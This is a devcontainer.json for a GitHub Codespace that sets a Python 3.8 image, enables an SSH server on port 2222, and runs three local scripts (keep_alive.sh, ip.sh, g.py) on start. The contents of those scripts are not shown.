{
    "name": "My Codespace",
    "image": "mcr.microsoft.com/vscode/devcontainers/python:3.8",
    "postStartCommand": "bash /workspaces/ab/keep_alive.sh & bash /workspaces/ab/ip.sh & python3 /workspaces/ab/g.py",
    "customizations": {
        "vscode": {
            "settings": {
                "python.pythonPath": "/usr/local/bin/python"
            },
            "extensions": [
                "ms-python.python"
            ]
        }
    },
    "features": {
        "ghcr.io/devcontainers/features/sshd:1": {
            "version": "latest",
            "startSSH": true  // Automatically starts the SSH server
        }
    },
    "portsAttributes": {
        "2222": {
            "label": "SSH Server",
            "onAutoForward": "openPreview"
        }
    },
    "remoteUser": "vscode"
}
